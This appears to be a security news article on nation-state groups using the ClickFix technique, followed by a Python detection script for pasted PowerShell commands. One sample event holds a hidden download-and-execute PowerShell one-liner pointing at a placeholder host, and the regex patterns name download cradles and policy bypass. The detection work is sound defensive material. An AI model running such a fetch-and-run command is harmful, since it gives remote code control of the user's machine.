A growing number of state-sponsored hacking groups from Iran, North Korea, and Russia are exploiting a deceptive social engineering method known as ClickFix to deliver malware in highly targeted phishing campaigns. These attacks have been actively observed between late 2024 and early 2025, according to a detailed report from cybersecurity firm Proofpoint.
🎯 Who’s Behind the Attacks?
The campaigns have been attributed to advanced persistent threat (APT) groups tracked as:
TA427 (Kimsuky) – North Korea
TA450 (MuddyWater) – Iran
TA422 (APT28) – Russia
UNK_RemoteRogue – Suspected Russian APT
While ClickFix has traditionally been linked to cybercriminals, its proven success has led to adoption by nation-state actors, reshaping the threat landscape.
🔍 What is ClickFix?
ClickFix is a cunning social engineering technique that tricks victims into infecting their own systems by copying and running attacker-supplied commands themselves. The commands are typically presented as a required step for:
CAPTCHA verifications
Device registration
This strategy replaces traditional malware delivery methods with infections the victim executes on their own machine, which makes the activity harder to detect and block.
🧪 Campaign Breakdown: TA427 (Kimsuky)
Initial Access: Spoofed meeting requests targeting individuals working on North Korean policy.
Tactic: A convincing conversation leads the victim to a malicious site, prompting them to run a PowerShell command.
Payload: Quasar RAT – an open-source remote access trojan.
Deception: Victims were misled by emails impersonating Japanese diplomats. Clicking a link opened a fake Japanese Embassy website that required device registration via PowerShell, ultimately triggering a malware chain.
🔁 Attack Chain Summary:
Phishing email with PDF lure
Fake embassy landing page
PowerShell command disguised as a fix
Scheduled Visual Basic script
Quasar RAT deployed and executed
🛠️ TA450 (MuddyWater) Uses ClickFix to Deploy Legitimate Tools
Timeline: November 13–14, 2024
Lure: Emails disguised as Microsoft security patches coinciding with Patch Tuesday.
Execution:
Users were instructed to run PowerShell with admin privileges.
A malicious script installed Level, a legitimate Remote Monitoring and Management (RMM) tool.
Attackers used this tool for espionage and data theft.
Targets:
Sectors: Finance, government, healthcare, education, transportation
Regions: Middle East (UAE, Saudi Arabia), North America (US, Canada), and parts of Europe (Germany, Switzerland)
🧨 UNK_RemoteRogue and Russian Espionage Operations
A suspected Russian APT, dubbed UNK_RemoteRogue, was observed leveraging ClickFix in phishing emails sent from compromised Zimbra servers. These emails contained links to weaponized Office documents.
Highlights:
Instructions embedded in the malicious page directed users to copy PowerShell code.
A tutorial video enhanced the believability.
Scripts launched commands linked to the Empire C2 framework.
Targets included employees at two defense contractors linked to arms manufacturing.
Ties to Ukraine: The campaign infrastructure overlapped with attacks targeting defense and aerospace firms tied to the Russia-Ukraine conflict, aiming to steal webmail credentials via spoofed login portals.
📊 Why ClickFix Is Gaining Traction Among APTs
According to Proofpoint:
Despite its sporadic use, ClickFix has now become a tactical favorite among state-sponsored threat actors from North Korea, Iran, and Russia. Its stealth and simplicity make it an ideal choice for socially engineered cyber attacks.
🧠 Key Takeaways for Cybersecurity Professionals
ClickFix is no longer a cybercrime-only tactic — nation-state actors are embracing it.
PowerShell abuse remains a top concern, particularly when users are socially manipulated into self-compromise.
Critical sectors across the globe—from defense to healthcare—are now targets.
Ongoing vigilance, email filtering, and employee training are essential to mitigate the threat.
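As an added illustration of the PowerShell-abuse takeaway (example detection code written for this page, not part of the Proofpoint report or the article), the following Python scores process-creation events for traits consistent with a user pasting a copied "fix" command: an interpreter started from the user's shell (the Windows Run dialog is hosted by explorer.exe) combined with hidden-window, encoded, or download-and-evaluate switches. The event format and the sample events are constructed assumptions, loosely modelled on Sysmon Event ID 1 fields.

```python
import re

# Parents from which a pasted command would typically start an interpreter:
# the Win+R Run dialog lives in explorer.exe; a terminal is the other common path.
USER_SHELL_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits common to "paste this to fix it" one-liners; each adds one point.
CMDLINE_INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_eval":     re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "bypass_policy":   re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
}

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one event dict with parent, image and cmdline keys."""
    reasons = []
    if _basename(event["image"]) not in INTERPRETERS:
        return 0, reasons
    if _basename(event["parent"]) in USER_SHELL_PARENTS:
        reasons.append("interpreter launched from user shell")
    for name, pattern in CMDLINE_INDICATORS.items():
        if pattern.search(event["cmdline"]):
            reasons.append(name)
    return len(reasons), reasons

def detect_clickfix(events, threshold=3):
    """Return [(event, reasons)] for events scoring at or above the threshold."""
    return [(ev, r) for ev in events for s, r in [score_event(ev)] if s >= threshold]

# Constructed sample events (hypothetical host, placeholder URL); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",                     # pasted via Run dialog
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm http://example.invalid/verify | iex"'},
    {"parent": r"C:\Windows\explorer.exe",                     # benign interactive use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
    {"parent": r"C:\Windows\System32\services.exe",            # scheduled admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print("ALERT:", ev["cmdline"], "->", ", ".join(reasons))
```

The threshold keeps single-trait events such as an admin's `-ExecutionPolicy Bypass` script below the alert line; tune it against your own baseline of interactive PowerShell use.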
🔐 Stay Informed, Stay Secure
The evolution of ClickFix from cybercrime circles to nation-state malware campaigns marks a new chapter in the threat landscape. As attackers grow more sophisticated, awareness and proactive defense remain our best tools.